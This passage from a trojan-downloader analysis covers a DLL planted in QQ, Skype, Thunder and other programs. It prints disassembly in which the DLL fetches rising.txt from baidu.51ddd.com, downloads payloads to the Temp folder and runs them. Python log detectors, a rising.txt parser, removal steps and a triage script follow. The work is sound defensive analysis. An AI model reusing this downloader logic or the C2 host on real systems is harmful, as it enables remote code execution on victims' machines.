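10.0.0.5 baidu.51ddd.com GET /tongji/tongji.asp?id=2&mac=001122334455 http generic
10.0.0.5 baidu.51ddd.com GET /rising.txt DownLoadPacket
10.0.0.5 baidu.51ddd.com GET /rising/97.css DownLoadPacket
10.0.0.7 www.example.com GET /index.html Mozilla/5.0
10.0.0.9 c2.example.invalid GET /tongji/tongji.asp?id=2&mac=AABBCCDDEEFF http generic
"""


def classify(line):
    """Return a finding dict for one log line, or None if nothing matches."""
    parts = line.strip().split(" ", 4)
    if len(parts) != 5:
        return None
    client, host, method, url, agent = parts
    parsed = urlsplit(url)
    # keep_blank_values: the beacon URL ends in "mac=" and the value may be empty
    # if GetAdaptersInfo failed, which is still worth flagging.
    query = parse_qs(parsed.query, keep_blank_values=True)
    mac = query.get("mac", [None])[0]

    if parsed.path == BEACON_PATH and mac is not None:
        kind = "beacon"            # host-independent: path + parameter shape
    elif host == C2_HOST and parsed.path == CONFIG_PATH:
        kind = "config_fetch"
    elif host == C2_HOST and parsed.path.startswith(PAYLOAD_PREFIX):
        kind = "payload_download"
    elif host == C2_HOST or agent in SUSPECT_AGENTS:
        kind = "suspicious"        # known host or the rare User-Agent alone
    else:
        return None
    return {"client": client, "host": host, "kind": kind, "mac": mac, "agent": agent}


def scan(log_text):
    """All findings in a log, in file order."""
    return [f for f in (classify(line) for line in log_text.splitlines()) if f]


def infected_clients(log_text):
    """Clients that beaconed or pulled the download list or a payload."""
    return {f["client"] for f in scan(log_text) if f["kind"] != "suspicious"}


if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
    print("infected:", sorted(infected_clients(SAMPLE_LOG)))
```

The beacon rule keys on the path and the `mac=` parameter rather than on the host name, because the server name is decrypted from the DLL's string table and a later build could point elsewhere; the User-Agent strings are treated as weaker, stand-alone indicators.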
2: Fetch the information needed to download the trojan from http://baidu.51ddd.com/rising.txt
.nsp0:10001540 sub esp, 610h
.nsp0:10001546 push ebx
.nsp0:10001547 xor ebx, ebx
.nsp0:10001549 push ebx ; dwFlags
.nsp0:1000154A push ebx ; lpszProxyBypass
.nsp0:1000154B push ebx ; lpszProxy
.nsp0:1000154C push ebx ; dwAccessType
.nsp0:1000154D push offset aDownloadpacket ; "DownLoadPacket"
.nsp0:10001552 call InternetOpenW
.nsp0:10001558 cmp eax, ebx
.nsp0:1000155A mov hInternet, eax
.nsp0:1000155F jz loc_100016EA
.nsp0:10001565 push edi
.nsp0:10001566 mov ecx, 7Fh
.nsp0:1000156B xor eax, eax
.nsp0:1000156D lea edi, [esp+618h+var_5FE]
.nsp0:10001571 mov [esp+618h+szUrl], bx
.nsp0:10001576 push offset Source ; "http://"
.nsp0:1000157B rep stosd
.nsp0:1000157D stosw
.nsp0:1000157F lea eax, [esp+61Ch+szUrl]
.nsp0:10001583 push eax ; Dest
.nsp0:10001584 call _wcscat
.nsp0:10001589 mov ecx, lpszServerName
.nsp0:1000158F lea edx, [esp+620h+szUrl]
.nsp0:10001593 push ecx ; Source
.nsp0:10001594 push edx ; Dest
.nsp0:10001595 call _wcscat
.nsp0:1000159A mov eax, dword_1000AF10
.nsp0:1000159F lea ecx, [esp+628h+szUrl]
.nsp0:100015A3 push eax ; Source
.nsp0:100015A4 push ecx ; Dest
.nsp0:100015A5 call _wcscat
.nsp0:100015AA mov eax, hInternet
.nsp0:100015AF add esp, 18h
.nsp0:100015B2 lea edx, [esp+618h+szUrl]
.nsp0:100015B6 push ebx ; dwContext
.nsp0:100015B7 push 84000100h ; dwFlags
.nsp0:100015BC push ebx ; dwHeadersLength
.nsp0:100015BD push ebx ; lpszHeaders
.nsp0:100015BE push edx ; lpszUrl
.nsp0:100015BF push eax ; hInternet
.nsp0:100015C0 call InternetOpenUrlW
.nsp0:100015C6 mov edx, eax
.nsp0:100015C8 cmp edx, ebx
.nsp0:100015CA mov dword_1000AF34, edx
.nsp0:100015D0 jz loc_100016D6
.nsp0:100015D6 mov ecx, 0FFh
.nsp0:100015DB xor eax, eax
.nsp0:100015DD lea edi, [esp+618h+var_3FF]
.nsp0:100015E4 mov [esp+618h+Buffer], bl
.nsp0:100015EB rep stosd
.nsp0:100015ED stosw
.nsp0:100015EF lea ecx, [esp+618h+dwNumberOfBytesRead]
.nsp0:100015F3 stosb
.nsp0:100015F4 push ecx ; lpdwNumberOfBytesRead
.nsp0:100015F5 lea eax, [esp+61Ch+Buffer]
.nsp0:100015FC push 400h ; dwNumberOfBytesToRead
.nsp0:10001601 push eax ; lpBuffer
.nsp0:10001602 push edx ; hFile
.nsp0:10001603 call InternetReadFile
.nsp0:10001609 test eax, eax
.nsp0:1000160B jz loc_100016C3
.nsp0:10001611 lea ecx, [esp+618h+Buffer]
.nsp0:10001618 push offset SubStr ; "<HEAD>"
.nsp0:1000161D push ecx ; Str
.nsp0:1000161E call _strstr
.nsp0:10001623 add esp, 8
.nsp0:10001626 test eax, eax
.nsp0:10001628 jnz loc_100016C3
.nsp0:1000162E cmp [esp+618h+dwNumberOfBytesRead], ebx
.nsp0:10001632 jbe loc_100016C3
.nsp0:10001638 push ebp
.nsp0:10001639 lea edx, [esp+61Ch+Buffer]
.nsp0:10001640 push offset Delim ; "\r\n"
.nsp0:10001645 push edx ; Str
.nsp0:10001646 xor ebp, ebp
.nsp0:10001648 call _strtok
.nsp0:1000164D mov edx, eax
.nsp0:1000164F add esp, 8
.nsp0:10001652 cmp edx, ebx
.nsp0:10001654 jz short loc_100016BA
.nsp0:10001656 push esi
.nsp0:10001657
.nsp0:10001657 loc_10001657: ; CODE XREF: sub_10001540+177j
.nsp0:10001657 xor eax, eax
.nsp0:10001659 mov edi, edx
.nsp0:1000165B mov [esp+620h+var_60F], eax
.nsp0:1000165F or ecx, 0FFFFFFFFh
.nsp0:10001662 mov [esp+620h+var_60B], eax
.nsp0:10001666 mov [esp+620h+var_610], bl
.nsp0:1000166A mov [esp+620h+var_607], al
.nsp0:1000166E xor esi, esi
.nsp0:10001670 repne scasb
.nsp0:10001672 not ecx
.nsp0:10001674 dec ecx
.nsp0:10001675 cmp ecx, ebx
.nsp0:10001677 jle short loc_10001691
.nsp0:10001679 lea edi, [esp+620h+var_610]
.nsp0:1000167D mov eax, edx
.nsp0:1000167F sub edi, edx
.nsp0:10001681
.nsp0:10001681 loc_10001681: ; CODE XREF: sub_10001540+14Fj
.nsp0:10001681 mov dl, [eax]
.nsp0:10001683 cmp dl, 2Eh
.nsp0:10001686 jz short loc_10001691
.nsp0:10001688 mov [edi+eax], dl
.nsp0:1000168B inc esi
.nsp0:1000168C inc eax
.nsp0:1000168D cmp esi, ecx
.nsp0:1000168F jl short loc_10001681
.nsp0:10001691
.nsp0:10001691 loc_10001691: ; CODE XREF: sub_10001540+137j
.nsp0:10001691 ; sub_10001540+146j
.nsp0:10001691 lea ecx, [esp+620h+var_610]
.nsp0:10001695 push ecx
.nsp0:10001696 call sub_10002011
.nsp0:1000169B mov edx, dword_1000AF30
.nsp0:100016A1 push offset Delim ; "\r\n"
.nsp0:100016A6 push ebx ; Str
.nsp0:100016A7 mov [edx+ebp*4], eax
.nsp0:100016AA call _strtok
.nsp0:100016AF add esp, 0Ch
.nsp0:100016B2 mov edx, eax
.nsp0:100016B4 inc ebp
.nsp0:100016B5 cmp edx, ebx
.nsp0:100016B7 jnz short loc_10001657
.nsp0:100016B9 pop esi
.nsp0:100016BA
.nsp0:100016BA loc_100016BA: ; CODE XREF: sub_10001540+114j
.nsp0:100016BA mov eax, dword_1000AF30
.nsp0:100016BF mov [eax+ebp*4], ebx
.nsp0:100016C2 pop ebp
.nsp0:100016C3
.nsp0:100016C3 loc_100016C3: ; CODE XREF: sub_10001540+CBj
.nsp0:100016C3 ; sub_10001540+E8j ...
.nsp0:100016C3 mov ecx, dword_1000AF34
.nsp0:100016C9 push ecx ; hInternet
.nsp0:100016CA call InternetCloseHandle
.nsp0:100016D0 mov dword_1000AF34, ebx
.nsp0:100016D6
.nsp0:100016D6 loc_100016D6: ; CODE XREF: sub_10001540+90j
.nsp0:100016D6 mov edx, hInternet
.nsp0:100016DC push edx ; hInternet
.nsp0:100016DD call InternetCloseHandle
.nsp0:100016E3 mov hInternet, ebx
.nsp0:100016E9 pop edi
.nsp0:100016EA
.nsp0:100016EA loc_100016EA: ; CODE XREF: sub_10001540+1Fj
.nsp0:100016EA pop ebx
.nsp0:100016EB add esp, 610h
.nsp0:100016F1 retn
3: Create C:\\WINDOWS\\system32\\Com\\comreat.mml and write the downloaded information into it
.nsp0:10001440 push ecx
.nsp0:10001441 mov eax, pszPath
.nsp0:10001446 push edi
.nsp0:10001447 push eax ; pszPath
.nsp0:10001448 call PathFileExistsW
.nsp0:1000144E test eax, eax
.nsp0:10001450 push 0 ; hTemplateFile
.nsp0:10001452 push 80h ; dwFlagsAndAttributes
.nsp0:10001457 jz loc_1000150B
.nsp0:1000145D mov ecx, pszPath
.nsp0:10001463 push 3 ; dwCreationDisposition
.nsp0:10001465 push 0 ; lpSecurityAttributes
.nsp0:10001467 push 2 ; dwShareMode
.nsp0:10001469 push 80000000h ; dwDesiredAccess
.nsp0:1000146E push ecx ; lpFileName
.nsp0:1000146F call CreateFileW
.nsp0:10001475 mov edi, eax
.nsp0:10001477 cmp edi, 0FFFFFFFFh
.nsp0:1000147A jnz short loc_10001481
.nsp0:1000147C xor eax, eax
.nsp0:1000147E pop edi
.nsp0:1000147F pop ecx
.nsp0:10001480 retn
.nsp0:10001481 ; ---------------------------------------------------------------------------
.nsp0:10001481
.nsp0:10001481 loc_10001481: ; CODE XREF: sub_10001440+3Aj
.nsp0:10001481 push ebx
.nsp0:10001482 push esi
.nsp0:10001483 push 0 ; lpFileSizeHigh
.nsp0:10001485 push edi ; hFile
.nsp0:10001486 call GetFileSize
.nsp0:1000148C mov esi, eax
.nsp0:1000148E push esi ; Size
.nsp0:1000148F call _malloc
.nsp0:10001494 add esp, 4
.nsp0:10001497 lea edx, [esp+10h+NumberOfBytesRead]
.nsp0:1000149B mov ebx, eax
.nsp0:1000149D push 0 ; lpOverlapped
.nsp0:1000149F push edx ; lpNumberOfBytesRead
.nsp0:100014A0 push esi ; nNumberOfBytesToRead
.nsp0:100014A1 push ebx ; lpBuffer
.nsp0:100014A2 push edi ; hFile
.nsp0:100014A3 call ReadFile
.nsp0:100014A9 test eax, eax
.nsp0:100014AB jz short loc_100014F1
.nsp0:100014AD push offset Delim ; "\r\n"
.nsp0:100014B2 push ebx ; Str
.nsp0:100014B3 call _strtok
.nsp0:100014B8 add esp, 8
.nsp0:100014BB xor esi, esi
.nsp0:100014BD test eax, eax
.nsp0:100014BF jz short loc_100014E4
.nsp0:100014C1
.nsp0:100014C1 loc_100014C1: ; CODE XREF: sub_10001440+A2j
.nsp0:100014C1 push eax
.nsp0:100014C2 call sub_10002011
.nsp0:100014C7 mov ecx, dword_1000AF2C
.nsp0:100014CD push offset Delim ; "\r\n"
.nsp0:100014D2 push 0 ; Str
.nsp0:100014D4 mov [ecx+esi*4], eax
.nsp0:100014D7 call _strtok
.nsp0:100014DC add esp, 0Ch
.nsp0:100014DF inc esi
.nsp0:100014E0 test eax, eax
.nsp0:100014E2 jnz short loc_100014C1
.nsp0:100014E4
.nsp0:100014E4 loc_100014E4: ; CODE XREF: sub_10001440+7Fj
.nsp0:100014E4 mov edx, dword_1000AF2C
.nsp0:100014EA mov dword ptr [edx+esi*4], 0
.nsp0:100014F1
.nsp0:100014F1 loc_100014F1: ; CODE XREF: sub_10001440+6Bj
.nsp0:100014F1 push ebx ; Memory
.nsp0:100014F2 call _free
.nsp0:100014F7 add esp, 4
.nsp0:100014FA pop esi
.nsp0:100014FB pop ebx
.nsp0:100014FC push edi ; hObject
.nsp0:100014FD call CloseHandle
.nsp0:10001503 mov eax, 1
.nsp0:10001508 pop edi
.nsp0:10001509 pop ecx
.nsp0:1000150A retn
4: Obtain the download address of the trojan to fetch, for example http://baidu.51ddd.com/rising/97.css; this information comes from rising.txt. The file is downloaded to C:\Windows\Temp\cocddjzv.exe (the file name is randomly generated), the downloaded trojan is executed, and then it is deleted.
.nsp0:10001AF0 sub esp, 200h
.nsp0:10001AF6 push ebx
.nsp0:10001AF7 push ebp
.nsp0:10001AF8 mov ebp, dword ptr byte_100080F4+4
.nsp0:10001AFE push esi
.nsp0:10001AFF xor ebx, ebx
.nsp0:10001B01 push edi
.nsp0:10001B02 xor esi, esi
.nsp0:10001B04
.nsp0:10001B04 loc_10001B04: ; CODE XREF: sub_10001AF0+B9j
.nsp0:10001B04 mov eax, dword_1000AF28
.nsp0:10001B09 cmp dword ptr [esi+eax], 0
.nsp0:10001B0D jz loc_10001BAF
.nsp0:10001B13 mov ecx, 7Fh
.nsp0:10001B18 xor eax, eax
.nsp0:10001B1A lea edi, [esp+210h+var_1FE]
.nsp0:10001B1E mov [esp+210h+Dest], 0
.nsp0:10001B25 rep stosd
.nsp0:10001B27 lea ecx, [esp+210h+Dest]
.nsp0:10001B2B push offset aCWindowsTemp ; "C:\\Windows\\Temp\"
.nsp0:10001B30 push ecx ; Dest
.nsp0:10001B31 stosw
.nsp0:10001B33 call _wcscat
.nsp0:10001B38 mov edx, dword_1000AF24
.nsp0:10001B3E lea ecx, [esp+218h+Dest]
.nsp0:10001B42 lea eax, [ebx+edx]
.nsp0:10001B45 push eax ; Source
.nsp0:10001B46 push ecx ; Dest
.nsp0:10001B47 call _wcscat
.nsp0:10001B4C add esp, 10h
.nsp0:10001B4F lea edx, [esp+210h+Dest]
.nsp0:10001B53 push 0
.nsp0:10001B55 push 0
.nsp0:10001B57 push 0
.nsp0:10001B59 push edx
.nsp0:10001B5A push offset aOpen ; "open"
.nsp0:10001B5F push 0
.nsp0:10001B61 call ebp
.nsp0:10001B63 push 0EA60h ; dwMilliseconds
.nsp0:10001B68 call Sleep
.nsp0:10001B6E mov eax, dword_1000AF28
.nsp0:10001B73 mov ecx, [esi+eax]
.nsp0:10001B76 push ecx
.nsp0:10001B77 call sub_10001A20
.nsp0:10001B7C mov edx, dword_1000AF28
.nsp0:10001B82 mov eax, [esi+edx]
.nsp0:10001B85 push eax
.nsp0:10001B86 call sub_100019F0
.nsp0:10001B8B mov ecx, dword_1000AF24
.nsp0:10001B91 lea edx, [ebx+ecx]
.nsp0:10001B94 push edx ; Source
.nsp0:10001B95 call sub_10001A90
.nsp0:10001B9A add esi, 4
.nsp0:10001B9D add esp, 0Ch
.nsp0:10001BA0 add ebx, 1Ah
.nsp0:10001BA3 cmp esi, 1000h
.nsp0:10001BA9 jl loc_10001B04
.nsp0:10001BAF
.nsp0:10001BAF loc_10001BAF: ; CODE XREF: sub_10001AF0+1Dj
.nsp0:10001BAF pop edi
.nsp0:10001BB0 pop esi
.nsp0:10001BB1 pop ebp
.nsp0:10001BB2 pop ebx
.nsp0:10001BB3 add esp, 200h
.nsp0:10001BB9 retn
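Steps 2 to 4 above show how the DLL turns the rising.txt reply into download URLs: the reply is read into a 0x400-byte buffer, discarded if it contains "<HEAD>" (an HTML page instead of the plain list) or if nothing was read, split with strtok on "\r\n", and for each line the characters before the first '.' are copied out and handed to sub_10002011. An analyst holding a captured rising.txt can replay that logic to list the URLs an infected host would have requested. This is an added example for this analysis, not the post's code; the listing does not show sub_10002011, so it is treated here as atoi, and the URL layout http://<server>/rising/<line> is assumed from the example URL the post gives. The sample inputs are constructed.

```python
"""Rebuild the download list from a captured rising.txt the way the DLL parses it.

Added example, not code from the post. Assumptions: sub_10002011 behaves like
atoi, and each line is appended to http://<server>/rising/ as in the post's
example URL.
"""
import re

BUFFER_SIZE = 0x400       # dwNumberOfBytesToRead in the InternetReadFile call
HTML_MARKER = b"<HEAD>"   # substring that makes the DLL discard the response
PAYLOAD_DIR = "/rising/"

# Constructed samples: a good list (with an empty line) and an HTML error reply.
SAMPLE_LIST = b"97.css\r\n98.css\r\n\r\n123.css\r\n"
SAMPLE_HTML = b"<HTML><HEAD><TITLE>404</TITLE></HEAD><BODY>not here</BODY></HTML>"


def parse_rising_txt(data):
    """Entries the DLL would keep, or [] where it would discard the reply."""
    chunk = data[:BUFFER_SIZE]              # only one 0x400-byte read is made
    if not chunk or HTML_MARKER in chunk:   # dwNumberOfBytesRead == 0 or strstr("<HEAD>")
        return []
    text = chunk.decode("latin-1")
    # strtok with "\r\n" treats each character as a separator and skips empty tokens.
    return [tok for tok in re.split(r"[\r\n]+", text) if tok]


def prefix_before_dot(entry):
    """Characters copied out of one line before the first '.' (the loop at loc_10001681)."""
    return entry.split(".", 1)[0]


def entry_ids(data):
    """Numeric id per entry, assuming sub_10002011 is atoi (assumption, see above)."""
    ids = []
    for entry in parse_rising_txt(data):
        m = re.match(r"\s*([+-]?\d+)", prefix_before_dot(entry))
        ids.append(int(m.group(1)) if m else 0)
    return ids


def download_urls(server, data):
    """URLs the downloader would request for each entry (assumed layout)."""
    return ["http://%s%s%s" % (server, PAYLOAD_DIR, e) for e in parse_rising_txt(data)]


if __name__ == "__main__":
    print(entry_ids(SAMPLE_LIST))
    for url in download_urls("baidu.51ddd.com", SAMPLE_LIST):
        print(url)
    print("html reply kept entries:", parse_rising_txt(SAMPLE_HTML))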
Detection and removal:
Check whether any of qq.exe, skype.exe, storm.exe, ppstream.exe, thunder5.exe or ppsap.exe is present in the process list; if so, terminate it.
If any of the software above is installed, delete the following DLL files, then reinstall from the official installer or overwrite them with the corresponding clean DLL files (or patch them by hand with a disassembler):
C:\Program Files\Skype\Phone\skmsg.dll
C:\Program Files\Thunder Network\Thunder\Program\BugReport.dll
C:\Program Files\PPStream\fds.dll
C:\Program Files\Tencent\QQ2009\Bin\AppCtrl.dll
C:\Program Files\Tencent\QQ\QQGroupMng.dll
C:\Program Files\Tencent\QQGame\common\ProcMsg.dll
C:\Program Files\StormII\Media2.dll
Finally, delete the files C:\\WINDOWS\\temp\\uninstaller.exe and C:\\WINDOWS\\system32\\Com\\comreat.mml.
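The removal steps above are easy to get wrong on a live machine, because the listed DLLs are the host applications' own files and the trojan replaced them with a copy of playList0.dat (the CopyFileW call in the dropper). A triage script that only reports which of the named files are present, hashes them, and shows which DLLs are byte-identical to playList0.dat lets the responder confirm the infection before replacing anything. This is an added example for this analysis, not the post's code; it takes a root directory so it can also run against a mounted disk image, and the demo() fixture is a constructed tree, not a real sample.

```python
"""Report-only triage for the files and processes named in the removal steps.

Added example, not code from the post. It deletes nothing: the DLLs belong to
the host applications and must be restored from the official installers.
"""
import hashlib
import os
import platform
import subprocess
import tempfile

# Host-application DLLs the post lists as overwritten, relative to the drive root.
REPLACED_DLLS = [
    r"Program Files\Skype\Phone\skmsg.dll",
    r"Program Files\Thunder Network\Thunder\Program\BugReport.dll",
    r"Program Files\PPStream\fds.dll",
    r"Program Files\Tencent\QQ2009\Bin\AppCtrl.dll",
    r"Program Files\Tencent\QQ\QQGroupMng.dll",
    r"Program Files\Tencent\QQGame\common\ProcMsg.dll",
    r"Program Files\StormII\Media2.dll",
]
DROPPER_DLL = r"WINDOWS\temp\playList0.dat"
DROPPED_FILES = [DROPPER_DLL, r"WINDOWS\temp\uninstaller.exe", r"WINDOWS\system32\Com\comreat.mml"]
HOST_PROCESSES = {"qq.exe", "skype.exe", "storm.exe", "ppstream.exe", "thunder5.exe", "ppsap.exe"}


def _full_path(root, rel):
    return os.path.join(root, *rel.split("\\"))


def sha256_of(path):
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def find_artifacts(root):
    """{relative_path: sha256} for every listed file that exists under root."""
    found = {}
    for rel in REPLACED_DLLS + DROPPED_FILES:
        full = _full_path(root, rel)
        if os.path.isfile(full):
            found[rel] = sha256_of(full)
    return found


def copies_of_dropper(found):
    """Replaced DLLs whose hash equals playList0.dat, i.e. what CopyFileW wrote."""
    ref = found.get(DROPPER_DLL)
    return sorted(p for p in REPLACED_DLLS if ref and found.get(p) == ref)


def running_host_processes():
    """Names from HOST_PROCESSES currently running (Windows only, via tasklist)."""
    if platform.system() != "Windows":
        return set()
    out = subprocess.run(["tasklist", "/FO", "CSV", "/NH"], capture_output=True, text=True).stdout
    names = {line.split(",")[0].strip('"').lower() for line in out.splitlines() if line}
    return names & HOST_PROCESSES


def demo():
    """Constructed fixture: a tree with one replaced DLL and the dropper file."""
    with tempfile.TemporaryDirectory() as root:
        for rel in (r"Program Files\PPStream\fds.dll", DROPPER_DLL):
            full = _full_path(root, rel)
            os.makedirs(os.path.dirname(full), exist_ok=True)
            with open(full, "wb") as f:
                f.write(b"MZ-constructed-sample")   # same bytes in both, as after CopyFileW
        found = find_artifacts(root)
        return found, copies_of_dropper(found)


if __name__ == "__main__":
    found, copies = find_artifacts("C:\\"), None
    copies = copies_of_dropper(found)
    for rel, digest in found.items():
        print(rel, digest)
    print("DLLs identical to playList0.dat:", copies)
    print("host processes running:", sorted(running_host_processes()))
```

Run it before terminating the processes listed above so the hashes can be recorded while the files are still in place; any DLL that is not a copy of playList0.dat but still differs from the vendor's file is worth a closer look rather than a blind replacement.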